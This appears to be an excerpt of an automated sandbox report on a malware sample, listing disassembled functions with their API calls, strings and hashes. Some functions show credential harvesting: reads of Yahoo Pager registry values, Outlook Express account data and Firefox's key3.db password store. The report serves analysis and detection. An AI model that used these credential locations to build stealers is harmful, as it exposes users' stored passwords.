                                        • strlen.MSVCRT ref: 0040339C
                                          • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                        • String ID: Personalities
                                        • API String ID: 2103853322-4287407858
                                        • Opcode ID: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                        • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                        • Opcode Fuzzy Hash: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                        • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                        Function 00444551 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 51registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00444573
                                          • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                          • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CloseOpenQueryValuememset
                                        • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                        • API String ID: 1830152886-1703613266
                                        • Opcode ID: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                        • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                        • Opcode Fuzzy Hash: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                        • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                        Function 00406D77 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(?), ref: 00406D87
                                        • sprintf.MSVCRT ref: 00406DAF
                                        • MessageBoxA.USER32(00000000,?,Error,00000030), ref: 00406DC8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ErrorLastMessagesprintf
                                        • String ID: Error$Error %d: %s
                                        • API String ID: 1670431679-1552265934
                                        • Opcode ID: 01084951b307502bfaf43d4fbd3e54dffba0eab1b535d90173241ec551fbeaa7
                                        • Instruction ID: a7eabb7ac59324d00fe13b249bdc4a7432a02f94c8438c44d3dfd779c6ab1540
                                        • Opcode Fuzzy Hash: 01084951b307502bfaf43d4fbd3e54dffba0eab1b535d90173241ec551fbeaa7
                                        • Instruction Fuzzy Hash: AEF0A77A8001086BDB10A7A4DC05FA676BCBB44344F1500B6B945F2151EA74DA058F98
                                        Function 004309ED Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 238COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        • foreign key on %s should reference only one column of table %T, xrefs: 00430A3D
                                        • unknown column "%s" in foreign key definition, xrefs: 00430C59
                                        • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430A65
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy
                                        • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                        • API String ID: 3510742995-272990098
                                        • Opcode ID: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                        • Instruction ID: 56a33166dce8f22c91c9f8fabbbf61fd3f81eb66f6c7064346fd2a8112c6bbd6
                                        • Opcode Fuzzy Hash: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                        • Instruction Fuzzy Hash: 32A14A71A00209DFCB14DF98D5909AEBBF1FF49704F24925EE805AB312D739EA41CB98
                                        Function 0043D62C Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 224COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset
                                        • String ID: H
                                        • API String ID: 2221118986-2852464175
                                        • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                        • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                        • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                        • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                        Function 0042563B Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 176COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy
                                        • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                        • API String ID: 3510742995-3170954634
                                        • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                        • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                        • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                        • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                        Function 0041DB51 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 176COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0041384F: memcpy.MSVCRT(?,00417664,00000004,?,CwA,00417664,?,?,00417743,?,?,?,?), ref: 0041385C
                                        • memcmp.MSVCRT(?,?,00000004,00000000,?,?,0041DE5E,?,?,?,?,00436073), ref: 0041DBAE
                                        • memcmp.MSVCRT(?,SQLite format 3,00000010,00000000,?,?,0041DE5E,?,?,?), ref: 0041DBDB
                                        • memcmp.MSVCRT(?,@ ,00000003,?,?,?,00000000,?,?,0041DE5E,?,?,?), ref: 0041DC47
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcmp$memcpy
                                        • String ID: @ $SQLite format 3
                                        • API String ID: 231171946-3708268960
                                        • Opcode ID: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                        • Instruction ID: bab8e9e22e0f3e3322208b515ecc9156aa125374c4e71f07eecd891e4e8170cf
                                        • Opcode Fuzzy Hash: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                        • Instruction Fuzzy Hash: 1851BFB1E002099BDB20DF69C981BEAB7F4AF54304F10056FE44597742E7B8EA85CB98
                                        Function 00414625 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 132COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy$memset
                                        • String ID: winWrite1$winWrite2
                                        • API String ID: 438689982-3457389245
                                        • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                        • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                        • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                        • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                        Function 004144FD Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 109COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpymemset
                                        • String ID: winRead
                                        • API String ID: 1297977491-2759563040
                                        • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                        • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                        • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                        • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                        Function 00449550 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 0044955B
                                        • memset.MSVCRT ref: 0044956B
                                        • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                        • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpymemset
                                        • String ID: gj
                                        • API String ID: 1297977491-4203073231
                                        • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                        • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                        • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                        • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                        Function 0040AB66 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 57COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                          • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,`Wu,00000000,?,?,0040A7BE,00000001,0044CBC0,75570A60), ref: 00406D4D
                                        • memset.MSVCRT ref: 0040AB9C
                                          • Part of subcall function 00411004: memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                          • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                          • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                        • sprintf.MSVCRT ref: 0040ABE1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                        • String ID: <%s>%s</%s>$</item>$<item>
                                        • API String ID: 3337535707-2769808009
                                        • Opcode ID: 94fb3ee970197c35f89b73c5c9c871d1a7be37581e6fd1bc9edd3009dd58cb65
                                        • Instruction ID: d3fada9700ccfca67da5e06a008153287a477451e6e6bd371d19fa9d49944530
                                        • Opcode Fuzzy Hash: 94fb3ee970197c35f89b73c5c9c871d1a7be37581e6fd1bc9edd3009dd58cb65
                                        • Instruction Fuzzy Hash: 50110631A00216BFEB11AF18CD42F99BB64FF0831CF10402AF509665A1DB79B970CB98
                                        Function 004090B0 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetParent.USER32(?), ref: 004090C2
                                        • GetWindowRect.USER32(?,?), ref: 004090CF
                                        • GetClientRect.USER32(00000000,?), ref: 004090DA
                                        • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                        • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Window$Rect$ClientParentPoints
                                        • String ID:
                                        • API String ID: 4247780290-0
                                        • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                        • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                        • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                        • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                        Function 0040B994 Relevance: 7.5, APIs: 5, Instructions: 44windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B9B1
                                          • Part of subcall function 00406C62: LoadCursorA.USER32(00000000,00007F02), ref: 00406C69
                                          • Part of subcall function 00406C62: SetCursor.USER32(00000000), ref: 00406C70
                                        • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B9D4
                                          • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B929
                                          • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B953
                                          • Part of subcall function 0040B903: _mbscat.MSVCRT ref: 0040B966
                                          • Part of subcall function 0040B903: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                        • SetCursor.USER32(?,?,0040CBD2), ref: 0040B9F9
                                        • SetFocus.USER32(?,?,?,0040CBD2), ref: 0040BA0B
                                        • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040BA22
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                        • String ID:
                                        • API String ID: 2374668499-0
                                        • Opcode ID: c223344c3a39cb50a824543c0933464b2b2e3202265bd74e385ec46d38a17b1f
                                        • Instruction ID: f32a2dbc35f7bf6d698eec3472f2a5e56a7287d41e7566127b95ec9cf4f32314
                                        • Opcode Fuzzy Hash: c223344c3a39cb50a824543c0933464b2b2e3202265bd74e385ec46d38a17b1f
                                        • Instruction Fuzzy Hash: 450129B5204604EFD326AB75DC85FA6B7E8FF48305F0504B9F2499B271CA716D018B14
                                        Function 0040AD38 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 44COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 0040AD5B
                                        • memset.MSVCRT ref: 0040AD71
                                          • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                          • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,`Wu,00000000,?,?,0040A7BE,00000001,0044CBC0,75570A60), ref: 00406D4D
                                          • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                          • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                        • sprintf.MSVCRT ref: 0040ADA8
                                        Strings
                                        • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040AD76
                                        • <%s>, xrefs: 0040ADA2
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                        • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                        • API String ID: 3699762281-1998499579
                                        • Opcode ID: f08f26e7c6bf1a33ee1b85fc51aa9ff2daee10922a246ae1c01303c1338e46c2
                                        • Instruction ID: d8254de8a9900f2911fb5d1c0b13fc0cc865a5027b69882d7a9a790f368f6919
                                        • Opcode Fuzzy Hash: f08f26e7c6bf1a33ee1b85fc51aa9ff2daee10922a246ae1c01303c1338e46c2
                                        • Instruction Fuzzy Hash: 49012B7294012877E721A719CC46FDABB6C9F54304F0500F7B50DF3082DBB8AB508BA4
                                        Function 00409A32 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75570A60,?,00000000), ref: 00409A3E
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75570A60,?,00000000), ref: 00409A4C
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75570A60,?,00000000), ref: 00409A5D
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75570A60,?,00000000), ref: 00409A74
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75570A60,?,00000000), ref: 00409A7D
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??3@
                                        • String ID:
                                        • API String ID: 613200358-0
                                        • Opcode ID: b88760ef2a9cfab350ce0474c381e2ce36942e7c393404a0687f9da8e94e787a
                                        • Instruction ID: b8efe39ffa321d4f2ce8ce974eba3160cbf96dc633dc1e2aadb4e529a4dc2577
                                        • Opcode Fuzzy Hash: b88760ef2a9cfab350ce0474c381e2ce36942e7c393404a0687f9da8e94e787a
                                        • Instruction Fuzzy Hash: A9F0F4726057855BD7209F6999C1A57F7D9BB98714791083FF189F3A81CB38FC404A18
                                        Function 00409A98 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75570A60,?,00000000), ref: 00409A3E
                                          • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75570A60,?,00000000), ref: 00409A4C
                                          • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75570A60,?,00000000), ref: 00409A5D
                                          • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75570A60,?,00000000), ref: 00409A74
                                          • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,75570A60,?,00000000), ref: 00409A7D
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AB3
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AC6
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AD9
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AEC
                                        • free.MSVCRT ref: 00409B00
                                          • Part of subcall function 00407A55: free.MSVCRT ref: 00407A5C
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??3@$free
                                        • String ID:
                                        • API String ID: 2241099983-0
                                        • Opcode ID: 2269fc206d2d283b797854ae73677064badd7dde056db72ab5a07573cc1b8c0d
                                        • Instruction ID: 0e1833da384361268bbd99a4020487bffb4c29eeff2b5ca4c2d3cb4a232d8152
                                        • Opcode Fuzzy Hash: 2269fc206d2d283b797854ae73677064badd7dde056db72ab5a07573cc1b8c0d
                                        • Instruction Fuzzy Hash: 3FF0A932F068B05BC2117B669002B0EB398AD81B2831A016FF8147B6D2CB3CBC504ADE
                                        Function 00410777 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                          • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                          • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                        • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                        • GetSysColor.USER32(00000005), ref: 004107A6
                                        • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                        • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                        • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Color$BrushClassModeNameText_strcmpimemset
                                        • String ID:
                                        • API String ID: 2775283111-0
                                        • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                        • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                                        • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                        • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                                        Function 0041479C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 96COMMON
                                        Download Yara Rule
                                        APIs
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                        • String ID: winSeekFile$winTruncate1$winTruncate2
                                        • API String ID: 885266447-2471937615
                                        • Opcode ID: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                        • Instruction ID: 76c2d8f9c45a6ab14154b13c081d04d7f34c1e3f6c53ca943db3ce1179081271
                                        • Opcode Fuzzy Hash: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                        • Instruction Fuzzy Hash: 5C313175600700AFE720AF65CC41EABB7E8FB88715F104A2EF965932D1D734E8808B29
                                        Function 00406AC7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                        • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,?,00406C55,00000000,?,00000000,?), ref: 00406AEB
                                        • CloseHandle.KERNEL32(?,?,00406C55,00000000,?,00000000,?), ref: 00406B11
